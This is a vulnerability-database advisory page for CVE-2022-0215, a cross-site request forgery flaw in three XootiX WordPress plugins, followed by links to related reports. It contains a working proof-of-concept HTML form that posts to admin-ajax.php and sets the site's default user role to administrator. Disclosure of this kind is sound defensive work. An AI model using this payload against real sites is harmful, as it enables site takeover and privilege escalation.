Lucene search
Chloe ChamberlandWPEX-ID:35A5247D-B599-4D95-9F08-1324C870F9D2HistoryJan 13, 2022 - 12:00 a.m.
XootiX Plugins - Various Versions CSRF to Arbitrary Options Update
2022-01-1300:00:00
Chloe Chamberland
54
0.005 Low
EPSS
Percentile
76.2%
The plugins Login/Signup Popup, Side Cart Woocommerce, and Waitlist Woocommerce are all vulnerable to cross-site request forgery due to a missing nonce check that would make it possible for attackers to update arbitrary options on a vulnerable WordPress site.
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="form" value="default_role=administrator" />
<input type="hidden" name="action" value="xoo_admin_settings_save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
thn
thn
High-Severity Vulnerability in 3 WordPress Plugins Affected 84,000 Websites
2022-01-17 05:18:00
hivepro
hivepro
patchstack
patchstack
WordPress Side Cart Woocommerce (Ajax) plugin <= 2.0 - Cross-Site Request Forgery (CSRF) vulnerability leading to Arbitrary Options Update
2022-01-13 00:00:00
cve
cve
CVE-2022-0215
2022-01-18 17:15:10
wordfence
wordfence
84,000 WordPress Sites Affected by Three Plugins With The Same Vulnerability
2022-01-13 14:54:00
cvelist
cvelist
nvd
nvd
CVE-2022-0215
2022-01-18 17:15:10
wpvulndb
wpvulndb
XootiX Plugins - Various Versions CSRF to Arbitrary Options Update
2022-01-13 00:00:00
prion
prion
Cross site request forgery (csrf)
2022-01-18 17:15:00